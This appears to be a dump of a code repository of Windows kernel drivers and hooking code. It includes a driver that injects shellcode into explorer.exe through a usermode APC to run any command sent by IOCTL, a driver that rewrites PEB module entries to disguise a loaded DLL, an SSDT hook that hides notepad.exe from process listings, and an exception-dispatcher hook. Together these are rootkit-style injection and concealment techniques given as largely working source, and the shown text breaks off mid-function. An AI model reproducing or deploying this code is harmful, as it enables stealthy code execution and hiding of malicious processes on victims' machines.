1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /KillThread/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=KillThread 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c\ 14 | LDasm.c -------------------------------------------------------------------------------- /PAGE_GURAD保护数据/PEB.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/PAGE_GURAD保护数据/PEB.suo -------------------------------------------------------------------------------- /PAGE_GURAD保护数据/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #pragma comment(lib, "ntdll.lib") 7 | 8 | typedef struct _MAD_MEM 9 | { 10 | MEMORY_BASIC_INFORMATION mbi; 11 | BOOL bAccess; 12 | }MAD_MEM, *PMAD_MEM; 13 | 14 | typedef ULONG (WINAPI *pRtlExceptionDispatcher)(PEXCEPTION_RECORD pExcptRec, CONTEXT* pContext); 15 | static pRtlExceptionDispatcher OldRtlExceptionDispatcher = NULL; 16 | 17 | BOOL bHook = FALSE; 18 | std::list memoryBlocks; 19 | 20 | typedef PIMAGE_NT_HEADERS 21 | (*PRtlImageNtHeader)(PVOID ModuleAddress); 22 | 23 | PRtlImageNtHeader RtlImageNtHeader; 24 | 25 | BOOL Check(PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext) 26 | { 27 | ULONG_PTR Eip = (ULONG_PTR)pExcptRec->ExceptionAddress; 28 | if (!memoryBlocks.empty() && pExcptRec->ExceptionCode == EXCEPTION_GUARD_PAGE) 29 | { 30 | std::list::iterator b; 31 | for (b = memoryBlocks.begin(); b != memoryBlocks.end(); b++) 32 | { 33 | PMAD_MEM mBlock = *b; 34 | if (Eip >= (ULONG_PTR)mBlock->mbi.BaseAddress 35 | && Eip<= (ULONG_PTR)mBlock->mbi.BaseAddress + mBlock->mbi.RegionSize) 36 | { 37 | mBlock->bAccess = TRUE; 38 | *b = mBlock; 39 | return TRUE; 40 | } 41 | } 42 | } 43 | return FALSE; 44 | } 45 | 46 | ULONG WINAPI MyRtlExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext) 47 | { 48 | if (Check(pExcptRec, pContext)) return 1; 49 | return OldRtlExceptionDispatcher(pExcptRec, pContext); 50 | } 51 | 52 | void Install() 53 | { 54 | BYTE *pAddr = (BYTE*)::GetProcAddress(::GetModuleHandleA("ntdll.dll"), "KiUserExceptionDispatcher"); 55 | if (bHook || !pAddr) return; 56 | while (*pAddr != 0xE8) 57 | { 58 | pAddr++; 59 | } 60 | printf("%08x\n", pAddr); 61 | OldRtlExceptionDispatcher = (pRtlExceptionDispatcher)((*(DWORD*)(pAddr+1))+5+(DWORD)pAddr); 62 | printf("%08x\n", OldRtlExceptionDispatcher); 63 | DWORD dwNewAddr = (DWORD)MyRtlExceptionDispatcher - (DWORD)pAddr - 5; 64 | DWORD dwOld; 65 | VirtualProtect((LPVOID)pAddr, 0x1000, PAGE_EXECUTE_READWRITE, &dwOld); 66 | RtlCopyMemory((PVOID)((DWORD)pAddr + 1), (PVOID)&dwNewAddr, 4); 67 | bHook = TRUE; 68 | } 69 | 70 | DWORD WINAPI MADThread(LPVOID Param) 71 | { 72 | std::list::iterator b; 73 | for (b=memoryBlocks.begin(); b!=memoryBlocks.end(); b++) 74 | { 75 | DWORD dwOld; 76 | PMAD_MEM mBlock = *b; 77 | mBlock->bAccess = FALSE; 78 | *b = mBlock; 79 | VirtualProtect( 80 | mBlock->mbi.BaseAddress, 81 | mBlock->mbi.RegionSize, 82 | mBlock->mbi.Protect | PAGE_GUARD, 83 | &dwOld); 84 | } 85 | while (1) 86 | { 87 | std::list::iterator b; 88 | for (b = memoryBlocks.begin(); b!=memoryBlocks.end(); b++) 89 | { 90 | DWORD dwOld; 91 | PMAD_MEM mBlock = *b; 92 | MEMORY_BASIC_INFORMATION mbi; 93 | VirtualQueryEx( 94 | GetCurrentProcess(), 95 | mBlock->mbi.BaseAddress, 96 | &mbi, 97 | sizeof(mbi)); 98 | if ((mbi.Protect & PAGE_GUARD) != PAGE_GUARD) 99 | { 100 | if (!mBlock->bAccess) 101 | { 102 | ExitProcess(-1); 103 | } 104 | } 105 | mBlock->bAccess = FALSE; 106 | *b = mBlock; 107 | VirtualProtect( 108 | mBlock->mbi.BaseAddress, 109 | mBlock->mbi.RegionSize, 110 | mBlock->mbi.Protect | PAGE_GUARD, 111 | &dwOld); 112 | } 113 | Sleep(1000*30); 114 | } 115 | } 116 | 117 | void InitMAD() 118 | { 119 | MEMORY_BASIC_INFORMATION meminfo; 120 | unsigned char *addr = NULL; 121 | unsigned char *endaddr = NULL; 122 | DWORD totalBytes = 0; 123 | 124 | Install(); 125 | 126 | RtlImageNtHeader = (PRtlImageNtHeader)GetProcAddress(::GetModuleHandleA("ntdll.dll"), "RtlImageNtHeader"); 127 | VirtualQuery((LPCVOID)GetModuleHandleA("game.dll"), &meminfo, sizeof(meminfo)); 128 | addr = (unsigned char*)meminfo.AllocationBase; 129 | endaddr = addr + RtlImageNtHeader(addr)->OptionalHeader.SizeOfImage; 130 | 131 | while (addr < endaddr) 132 | { 133 | if (!VirtualQueryEx(GetCurrentProcess(), addr, &meminfo, sizeof(meminfo))) 134 | break; 135 | BOOL Commited = meminfo.State & MEM_COMMIT; 136 | BOOL Readable = meminfo.Protect & (PAGE_READWRITE | PAGE_READONLY); 137 | BOOL Guarded = meminfo.Protect & PAGE_GUARD; 138 | 139 | if (Commited && Readable && !Guarded) 140 | { 141 | totalBytes += (DWORD)meminfo.RegionSize; 142 | PMAD_MEM pNew = new MAD_MEM; 143 | pNew->mbi = meminfo; 144 | pNew->bAccess = FALSE; 145 | memoryBlocks.push_back(pNew); 146 | } 147 | addr = (unsigned char *)meminfo.BaseAddress + meminfo.RegionSize; 148 | } 149 | CreateThread( 150 | NULL, 151 | 0, 152 | MADThread, 153 | NULL, 154 | 0, 155 | NULL); 156 | } 157 | 158 | int main() 159 | { 160 | Install(); 161 | return 0; 162 | } -------------------------------------------------------------------------------- /RPC/APCExec.c: -------------------------------------------------------------------------------- 1 | #include "Process.h" 2 | 3 | const WCHAR devicename[]=L"\\Device\\MyRPC"; 4 | const WCHAR devicelink[]=L"\\??\\MyRPC"; 5 | 6 | VOID KE_Unload(PDRIVER_OBJECT driver) 7 | { 8 | UNICODE_STRING devlink; 9 | RtlInitUnicodeString(&devlink,devicelink); 10 | IoDeleteSymbolicLink(&devlink); 11 | IoDeleteDevice(driver->DeviceObject); 12 | DbgPrint("KernelExec -> Driver Unloaded"); 13 | } 14 | 15 | NTSTATUS KE_Dispatch(PDEVICE_OBJECT DeviceObject, PIRP pIrp) 16 | { 17 | PIO_STACK_LOCATION irpsp; 18 | NTSTATUS status = STATUS_SUCCESS; 19 | PUCHAR charBuffer; 20 | ULONG Length = 0; 21 | 22 | irpsp = IoGetCurrentIrpStackLocation(pIrp); 23 | charBuffer = (PUCHAR)pIrp->AssociatedIrp.SystemBuffer;; 24 | 25 | switch (irpsp->MajorFunction) 26 | { 27 | case IRP_MJ_CREATE: 28 | DbgPrint("IRP_MJ_CREATE"); 29 | break; 30 | case IRP_MJ_CLOSE: 31 | DbgPrint("IRP_MJ_CLOSE"); 32 | break; 33 | case IRP_MJ_DEVICE_CONTROL: 34 | { 35 | switch (irpsp->Parameters.DeviceIoControl.IoControlCode) 36 | { 37 | default: 38 | DbgPrint("Process : %s\n", charBuffer); 39 | RunProcess(charBuffer); 40 | break; 41 | } 42 | } 43 | default: 44 | status = STATUS_SUCCESS; 45 | } 46 | pIrp->IoStatus.Status=status; 47 | pIrp->IoStatus.Information = 0; 48 | IoCompleteRequest(pIrp,IO_NO_INCREMENT); 49 | return 0; 50 | } 51 | 52 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) 53 | { 54 | 55 | NTSTATUS NtStatus = STATUS_SUCCESS; 56 | PDEVICE_OBJECT pDeviceObject = NULL; 57 | UNICODE_STRING usDeviceName, usDosDeviceName; 58 | 59 | RtlInitUnicodeString(&usDeviceName, devicename); 60 | RtlInitUnicodeString(&usDosDeviceName, devicelink); 61 | 62 | IoCreateDevice( 63 | pDriverObject, 64 | 0, 65 | &usDeviceName, 66 | FILE_DEVICE_UNKNOWN, 67 | 0, 68 | FALSE, 69 | &pDeviceObject ); 70 | IoCreateSymbolicLink(&usDosDeviceName, &usDeviceName); 71 | 72 | if(NtStatus == STATUS_SUCCESS) 73 | { 74 | pDriverObject->MajorFunction[IRP_MJ_CLEANUP] = KE_Dispatch; 75 | pDriverObject->MajorFunction[IRP_MJ_CLOSE] = KE_Dispatch; 76 | pDriverObject->MajorFunction[IRP_MJ_CREATE] = KE_Dispatch; 77 | pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = KE_Dispatch; 78 | pDriverObject->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = KE_Dispatch; 79 | pDriverObject->MajorFunction[IRP_MJ_READ] = KE_Dispatch; 80 | pDriverObject->MajorFunction[IRP_MJ_WRITE] = KE_Dispatch; 81 | pDriverObject->DriverUnload = KE_Unload; 82 | 83 | DbgPrint("KernelExec -> Driver Loaded"); 84 | } 85 | return NtStatus; 86 | } 87 | 88 | -------------------------------------------------------------------------------- /RPC/Process.c: -------------------------------------------------------------------------------- 1 | #include "Process.h" 2 | 3 | typedef enum 4 | { 5 | OriginalApcEnvironment, 6 | AttachedApcEnvironment, 7 | CurrentApcEnvironment 8 | } KAPC_ENVIRONMENT; 9 | 10 | void ApcKernelRoutine( 11 | IN struct _KAPC *Apc, 12 | IN OUT PKNORMAL_ROUTINE *NormalRoutine, 13 | IN OUT PVOID *NormalContext, 14 | IN OUT PVOID *SystemArgument1, 15 | IN OUT PVOID *SystemArgument2); 16 | NTSTATUS InstallUserModeApc(LPSTR lpProcess, ULONG pTargetThread, ULONG pTargetProcess); 17 | void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2); 18 | void ApcCreateProcessEnd(); 19 | 20 | ULONG ActiveProcessLinksOffset = 0x88; 21 | ULONG ImageFileNameOffset = 0x174; 22 | ULONG ThreadListHeadOffset = 0x50; 23 | ULONG ThreadListEntryOffset = 0x1B0; 24 | ULONG AltertableOffset = 0x164; 25 | ULONG WinExecOffset = 0x7C8623AD; 26 | 27 | void DependVersion() 28 | { 29 | ULONG MajorVersion, MinorVersion; 30 | PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL); 31 | if (MajorVersion == 6) 32 | { 33 | WinExecOffset = 0x77E6E5FD; 34 | ActiveProcessLinksOffset = 0xb8; 35 | ImageFileNameOffset = 0x16C; 36 | ThreadListHeadOffset = 0x190; 37 | ThreadListEntryOffset = 0x1e0; 38 | AltertableOffset = 0x3C; 39 | } 40 | } 41 | 42 | void RunProcess(LPSTR lpProcess) 43 | { 44 | ULONG Alert; 45 | char *name; 46 | ULONG pTargetProcess; 47 | ULONG pTargetThread; 48 | ULONG pNotAlertableThread; 49 | ULONG pSystemProcess; 50 | ULONG pTempThread; 51 | ULONG pNextEntry, pListHead, pThreadNextEntry, pThreadListHead; 52 | 53 | if (strlen(lpProcess) > 300) return; 54 | pSystemProcess = (ULONG)PsGetCurrentProcess(); 55 | if (!pSystemProcess) 56 | { 57 | DbgPrint("APCExec -> Cannot find System process!"); 58 | return; 59 | } 60 | 61 | pListHead = pSystemProcess + ActiveProcessLinksOffset; 62 | pNextEntry = *(ULONG*)pListHead; 63 | if (!pNextEntry) 64 | { 65 | DbgPrint("KernelExec -> No processes found!"); 66 | return; 67 | } 68 | 69 | while (pNextEntry != pListHead) 70 | { 71 | pSystemProcess = pNextEntry - ActiveProcessLinksOffset; 72 | name = (char *)pSystemProcess + ImageFileNameOffset; 73 | DbgPrint("ProcessName %s\n", name); 74 | if (_strnicmp(name, "explorer.exe", 12) == 0) 75 | { 76 | pTargetProcess = pSystemProcess; 77 | DbgPrint("Found explorer.exe!\n"); 78 | pTargetThread = pNotAlertableThread = 0; 79 | pThreadListHead = pSystemProcess + ThreadListHeadOffset; 80 | pThreadNextEntry = *(ULONG*)pThreadListHead; 81 | while (pThreadNextEntry != pThreadListHead) 82 | { 83 | pTempThread = pThreadNextEntry - ThreadListEntryOffset; 84 | DbgPrint("ETHREAD address is : 0x%08x\n", (ULONG*)pTempThread); 85 | DbgPrint("Alertable is : 0x%08x", *(char*)(pTempThread + AltertableOffset)); 86 | 87 | if (AltertableOffset == 0x164) 88 | { 89 | Alert = *(char*)(pTempThread + AltertableOffset); 90 | } 91 | else 92 | { 93 | Alert = (*(char*)(pTempThread + AltertableOffset)) & (1<<8); 94 | } 95 | if (Alert) 96 | { 97 | pTargetThread = pTempThread; 98 | DbgPrint("Found alertable thread!\n"); 99 | break; 100 | } 101 | else 102 | { 103 | pNotAlertableThread = pTempThread; 104 | } 105 | pThreadNextEntry = *(ULONG*)pThreadNextEntry; 106 | } 107 | break; 108 | } 109 | pNextEntry = *(ULONG*)pNextEntry; 110 | } 111 | 112 | if (!pTargetProcess) 113 | { 114 | DbgPrint("Could not find Explorer.exe"); 115 | return; 116 | } 117 | if (!pTargetThread) 118 | { 119 | pTargetThread = pNotAlertableThread; 120 | } 121 | if (pTargetThread) 122 | { 123 | DbgPrint("Target thread: 0x%p", pTargetThread); 124 | InstallUserModeApc(lpProcess, pTargetThread, pTargetProcess); 125 | } 126 | else 127 | { 128 | DbgPrint("No thread found!\n"); 129 | } 130 | } 131 | 132 | PMDL MyMDL = NULL; 133 | void ApcKernelRoutine(IN struct _KAPC *Apc, 134 | IN OUT PKNORMAL_ROUTINE *NormalRoutine, 135 | IN OUT PVOID *NormalContext, 136 | IN OUT PVOID *SystemArgument1, 137 | IN OUT PVOID *SystemArgument2) 138 | { 139 | if (Apc) ExFreePool(Apc); 140 | if (MyMDL) 141 | { 142 | MmUnlockPages(MyMDL); 143 | IoFreeMdl(MyMDL); 144 | MyMDL = NULL; 145 | } 146 | DbgPrint("ApcKernelRoutine called!\n"); 147 | } 148 | 149 | NTSTATUS InstallUserModeApc(LPSTR lpProcess, ULONG pTargetThread, ULONG pTargetProcess) 150 | { 151 | PRKAPC pApc = NULL; 152 | PVOID pMappedAddress = NULL; 153 | ULONG dwSize = 0; 154 | KAPC_STATE ApcState; 155 | ULONG *data_addr = NULL; 156 | ULONG dwMappedAddress = 0; 157 | NTSTATUS status = STATUS_UNSUCCESSFUL; 158 | if (!pTargetProcess || !pTargetThread) 159 | { 160 | return status; 161 | } 162 | pApc = ExAllocatePool(NonPagedPool, sizeof(KAPC)); 163 | if (!pApc) 164 | { 165 | DbgPrint("ExAllocatePool failed!\n"); 166 | return status; 167 | } 168 | 169 | dwSize = (unsigned char*)ApcCreateProcessEnd - (unsigned char*)ApcCreateProcess; 170 | MyMDL = IoAllocateMdl(ApcCreateProcess, dwSize, FALSE, FALSE, NULL); 171 | if (!MyMDL) 172 | { 173 | DbgPrint("Failed to allocate MDL!\n"); 174 | ExFreePool(pApc); 175 | return status; 176 | } 177 | 178 | __try 179 | { 180 | MmProbeAndLockPages(MyMDL, KernelMode, IoWriteAccess); 181 | } 182 | __except(EXCEPTION_EXECUTE_HANDLER) 183 | { 184 | DbgPrint("MmProbeAndLockPages error!\n"); 185 | IoFreeMdl(MyMDL); 186 | ExFreePool(pApc); 187 | return status; 188 | } 189 | 190 | KeStackAttachProcess((PRKPROCESS)pTargetProcess, &ApcState); 191 | pMappedAddress = MmMapLockedPagesSpecifyCache(MyMDL, 192 | UserMode, MmCached, NULL, FALSE, NormalPagePriority); 193 | 194 | if (!pMappedAddress) 195 | { 196 | DbgPrint("Cannot map address"); 197 | KeUnstackDetachProcess(&ApcState); 198 | IoFreeMdl(MyMDL); 199 | ExFreePool(pApc); 200 | return STATUS_UNSUCCESSFUL; 201 | } 202 | else 203 | { 204 | DbgPrint("Memory at %p", pMappedAddress); 205 | } 206 | 207 | dwMappedAddress = (ULONG)pMappedAddress; 208 | memset((unsigned char*)pMappedAddress + 0x14, 0, 50); 209 | memcpy((unsigned char*)pMappedAddress + 0x14, lpProcess, strlen(lpProcess)); 210 | memcpy((unsigned char*)pMappedAddress + 0x1, &WinExecOffset, sizeof(ULONG)); 211 | 212 | data_addr = (ULONG *)((char*)pMappedAddress + 0x9); 213 | *data_addr = dwMappedAddress + 0x14; 214 | 215 | KeUnstackDetachProcess(&ApcState); 216 | KeInitializeApc(pApc, 217 | (ULONG*)pTargetThread, 218 | OriginalApcEnvironment, 219 | &ApcKernelRoutine, 220 | NULL, 221 | pMappedAddress, 222 | UserMode, 223 | NULL); 224 | if (!KeInsertQueueApc(pApc, 0, NULL, 0)) 225 | { 226 | DbgPrint("Failed to insert APC"); 227 | MmUnlockPages(MyMDL); 228 | IoFreeMdl(MyMDL); 229 | ExFreePool(pApc); 230 | return STATUS_UNSUCCESSFUL; 231 | } 232 | else 233 | { 234 | DbgPrint("Apc delivered!\n"); 235 | } 236 | 237 | if (!*(char*)(pTargetThread+0x4a)) 238 | { 239 | *(char*)(pTargetThread+0x4a) = TRUE; 240 | } 241 | return 0; 242 | } 243 | 244 | __declspec(naked) void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2) 245 | { 246 | __asm 247 | { 248 | mov eax,0x7C8623AD 249 | push 1 250 | nop 251 | push 0xabcd 252 | call eax 253 | jmp end 254 | nop 255 | nop 256 | nop 257 | nop 258 | nop 259 | nop 260 | nop 261 | nop 262 | nop 263 | nop 264 | nop 265 | nop 266 | nop 267 | nop 268 | nop 269 | nop 270 | nop 271 | nop 272 | nop 273 | nop 274 | nop 275 | nop 276 | nop 277 | nop 278 | nop 279 | nop 280 | nop 281 | nop 282 | nop 283 | nop 284 | nop 285 | nop 286 | nop 287 | nop 288 | nop 289 | nop 290 | nop 291 | nop 292 | nop 293 | nop 294 | nop 295 | nop 296 | nop 297 | nop 298 | nop 299 | nop 300 | nop 301 | nop 302 | nop 303 | nop 304 | nop 305 | nop 306 | nop 307 | nop 308 | nop 309 | nop 310 | nop 311 | nop 312 | nop 313 | nop 314 | nop 315 | nop 316 | nop 317 | nop 318 | nop 319 | nop 320 | nop 321 | nop 322 | nop 323 | nop 324 | end: 325 | nop 326 | ret 0x0c 327 | } 328 | 329 | } 330 | 331 | void ApcCreateProcessEnd() 332 | { 333 | 334 | } 335 | -------------------------------------------------------------------------------- /RPC/Process.h: -------------------------------------------------------------------------------- 1 | #include "ntifs.h" 2 | 3 | void RunProcess(LPSTR lpProcess); 4 | -------------------------------------------------------------------------------- /RPC/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /RPC/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=RPC 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=APCExec.c Process.c 14 | -------------------------------------------------------------------------------- /Ring0ChangePEB/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | NTKERNELAPI 4 | NTSTATUS 5 | PsLookupProcessByProcessId( 6 | HANDLE ProcessId, 7 | PEPROCESS *Process 8 | ); 9 | 10 | NTKERNELAPI 11 | VOID 12 | KeAttachProcess ( 13 | PEPROCESS Process 14 | ); 15 | 16 | NTKERNELAPI 17 | VOID 18 | KeDetachProcess( 19 | ); 20 | 21 | wchar_t origiBaseName[1024]; 22 | wchar_t origiFullName[1024]; 23 | 24 | typedef struct _PEB_LDR_DATA { 25 | ULONG Length; 26 | BOOLEAN Initialized; 27 | PVOID SsHandle; 28 | LIST_ENTRY InLoadOrderModuleList; 29 | LIST_ENTRY InMemoryOrderModuleList; 30 | LIST_ENTRY InInitializationOrderModuleList; 31 | }PEB_LDR_DATA, *PPEB_LDR_DATA; 32 | 33 | 34 | typedef struct _LDR_DATA_TABLE_ENTRY { 35 | LIST_ENTRY InLoadOrderLinks; 36 | LIST_ENTRY InMemoryOrderLinks; 37 | LIST_ENTRY InInitializationOrderLinks; 38 | PVOID DllBase; 39 | PVOID EntryPoint; 40 | ULONG SizeOfImage; 41 | UNICODE_STRING FullDllName; 42 | UNICODE_STRING BaseDllName; 43 | ULONG Flags; 44 | USHORT LoadCount; 45 | USHORT TlsIndex; 46 | union { 47 | LIST_ENTRY HashLinks; 48 | struct { 49 | PVOID SectionPointer; 50 | ULONG CheckSum; 51 | }; 52 | }; 53 | union { 54 | struct { 55 | ULONG TimeDateStamp; 56 | }; 57 | struct { 58 | PVOID LoadedImports; 59 | }; 60 | }; 61 | struct _ACTIVATION_CONTEXT * EntryPointActivationContext; 62 | PVOID PatchInformation; 63 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 64 | 65 | 66 | NTSTATUS ModifyModuleName(BOOLEAN change) 67 | { 68 | NTSTATUS status; 69 | PEPROCESS Process; 70 | ULONG ulPEB; 71 | PPEB_LDR_DATA pLdr; 72 | PLDR_DATA_TABLE_ENTRY pLdt = NULL; 73 | PLIST_ENTRY pList,pHead; 74 | wchar_t wszFakePath[] = L"test.com"; 75 | 76 | status = PsLookupProcessByProcessId( 77 | (HANDLE)1576, 78 | &Process ); 79 | if ( status!= STATUS_SUCCESS ) 80 | { 81 | DbgPrint("PsLookupProcessByProcessId = 0x%08lX",status); 82 | return status; 83 | } 84 | ObDereferenceObject(Process); 85 | 86 | KeAttachProcess(Process); 87 | DbgPrint("Process : 0x%08lX. \n",Process); 88 | ulPEB = *(ULONG *)((ULONG)Process + 0x1B0); 89 | DbgPrint("PEB : 0x%08lX. \n",ulPEB); 90 | __try 91 | { 92 | pLdr = *(PPEB_LDR_DATA *)(ulPEB + 0x00C); 93 | DbgPrint("pLdr 0x%08lX. \n",pLdr); 94 | pHead = pLdr->InLoadOrderModuleList.Flink; 95 | pList = pHead; 96 | 97 | do 98 | { 99 | pLdt = CONTAINING_RECORD(pList, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); 100 | if ( pLdt->EntryPoint && pLdt->FullDllName.Buffer && 101 | pLdt->BaseDllName.Buffer && pLdt->DllBase ) 102 | { 103 | DbgPrint("FullDllName : %S \n",pLdt->FullDllName.Buffer); 104 | DbgPrint("BaseDllName : %S \n",pLdt->BaseDllName.Buffer); 105 | DbgPrint("DllBase : 0x%08lX. \n",pLdt->DllBase); 106 | DbgPrint("DllSize : 0x%08lX. \n",pLdt->SizeOfImage); 107 | DbgPrint("--------------"); 108 | if ( (ULONG)pLdt->DllBase == 0x7C800000 ) 109 | { 110 | DbgPrint("Modify."); 111 | DbgPrint("--------------"); 112 | if (change) 113 | { 114 | wcscpy(origiBaseName,pLdt->BaseDllName.Buffer); 115 | wcscpy(origiFullName,pLdt->FullDllName.Buffer); 116 | wcscpy(pLdt->FullDllName.Buffer,wszFakePath); 117 | wcscpy(pLdt->BaseDllName.Buffer,wszFakePath); 118 | } 119 | else 120 | { 121 | wcscpy(pLdt->FullDllName.Buffer,origiFullName); 122 | wcscpy(pLdt->BaseDllName.Buffer,origiBaseName); 123 | } 124 | } 125 | } 126 | pList = pList->Flink; 127 | } while ( pList != pHead ); 128 | } 129 | __except (EXCEPTION_EXECUTE_HANDLER) 130 | { 131 | status = GetExceptionCode(); 132 | DbgPrint("GetExceptionCode() = 0x%08lX. \n",status ); 133 | } 134 | KeDetachProcess(); 135 | 136 | return status; 137 | } 138 | 139 | void Unload(PDRIVER_OBJECT driver) 140 | { 141 | DbgPrint("Unload!\n"); 142 | ModifyModuleName(FALSE); 143 | } 144 | 145 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 146 | { 147 | DbgPrint("DriverEntry!\n"); 148 | ModifyModuleName(TRUE); 149 | driver->DriverUnload = Unload; 150 | return STATUS_SUCCESS; 151 | } 152 | -------------------------------------------------------------------------------- /Ring0ChangePEB/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /Ring0ChangePEB/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=Ring0ChangePEB 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /SSDTHook/SSDTHook.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define SYSTEMSERVICE(func) \ 4 | KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)func + 1)] 5 | #define SYSTEMINDEX(func) \ 6 | *(PULONG)((PUCHAR)func + 1) 7 | #define HOOKFUNC(func, new, old) \ 8 | old = (PVOID)InterlockedExchange( (PULONG) \ 9 | &NewServiceDescriptorTable[SYSTEMINDEX(func)], (ULONG)new) 10 | #define UNHOOKFUNC(func, old) \ 11 | InterlockedExchange( (PULONG) \ 12 | &NewServiceDescriptorTable[SYSTEMINDEX(func)], (ULONG)old) 13 | 14 | #pragma pack(1) 15 | typedef struct ServiceDescriptorEntry { 16 | unsigned int *ServiceTableBase; 17 | unsigned int *ServiceCounterTableBase; 18 | unsigned int NumberOfServices; 19 | unsigned char *ParamTableBae; 20 | } SSDT_ENTRY; 21 | #pragma pack() 22 | __declspec(dllimport) SSDT_ENTRY KeServiceDescriptorTable; 23 | 24 | typedef struct _SYSTEM_PROCESSOR_TIMES 25 | { 26 | LARGE_INTEGER IdleTime; 27 | LARGE_INTEGER KernelTime; 28 | LARGE_INTEGER UserTime; 29 | LARGE_INTEGER DpcTime; 30 | LARGE_INTEGER InterruptTime; 31 | ULONG InterruptCount; 32 | } SYSTEM_PROCESSOR_TIMES, *PSYSTEM_PROCESSOR_TIMES; 33 | 34 | struct _SYSTEM_THREADS 35 | { 36 | LARGE_INTEGER KernelTime; 37 | LARGE_INTEGER UserTime; 38 | LARGE_INTEGER CreateTime; 39 | ULONG WaitTime; 40 | PVOID StartAddress; 41 | CLIENT_ID ClientIs; 42 | KPRIORITY Priority; 43 | KPRIORITY BasePriority; 44 | ULONG ContextSwitchCount; 45 | ULONG ThreadState; 46 | KWAIT_REASON WaitReason; 47 | }; 48 | 49 | typedef struct _SYSTEM_PROCESSES 50 | { 51 | ULONG NextEntryDelta; 52 | ULONG ThreadCount; 53 | ULONG Reserved[6]; 54 | LARGE_INTEGER CreateTime; 55 | LARGE_INTEGER UserTime; 56 | LARGE_INTEGER KernelTime; 57 | UNICODE_STRING ProcessName; 58 | KPRIORITY BasePriority; 59 | ULONG ProcessId; 60 | ULONG InheritedFromProcessId; 61 | ULONG HandleCount; 62 | ULONG Reserved2[2]; 63 | VM_COUNTERS VmCounters; 64 | IO_COUNTERS IoCounters; 65 | struct _SYSTEM_THREADS Threads[1]; 66 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 67 | 68 | NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( 69 | IN ULONG SystemInformationClass, 70 | IN PVOID SystemInformation, 71 | IN ULONG SystemInformationLength, 72 | OUT PULONG ReturnLength ); 73 | 74 | typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)( 75 | ULONG SystemInformationClass, 76 | PVOID SystemInformation, 77 | ULONG SystemInformationLength, 78 | PULONG ReturnLength); 79 | ZWQUERYSYSTEMINFORMATION OldFunc; 80 | 81 | NTSTATUS NewFunc( 82 | IN ULONG SystemInformationClass , 83 | IN PVOID SystemInformation , 84 | IN ULONG SystemInformationLength , 85 | OUT PULONG ReturnLength ); 86 | 87 | PMDL MyMDL; 88 | PVOID *NewServiceDescriptorTable; 89 | LARGE_INTEGER UserTime, KernelTime, AllTime; 90 | ZWQUERYSYSTEMINFORMATION OldFunc; 91 | 92 | NTSTATUS NewFunc( 93 | ULONG SystemInformationClass, 94 | PVOID SystemInformation, 95 | ULONG SystemInformationLength, 96 | PULONG ReturnLength 97 | ) 98 | { 99 | NTSTATUS status; 100 | status = OldFunc( 101 | SystemInformationClass, 102 | SystemInformation, 103 | SystemInformationLength, 104 | ReturnLength ); 105 | 106 | if (NT_SUCCESS(status)) 107 | { 108 | if (SystemInformationClass == 5) 109 | { 110 | PSYSTEM_PROCESSES now = (PSYSTEM_PROCESSES)SystemInformation; 111 | PSYSTEM_PROCESSES prev = NULL; 112 | while (now) 113 | { 114 | if (memcmp(now->ProcessName.Buffer, L"notepad.exe", now->ProcessName.Length) == 0) 115 | { 116 | UserTime.QuadPart += now->UserTime.QuadPart; 117 | 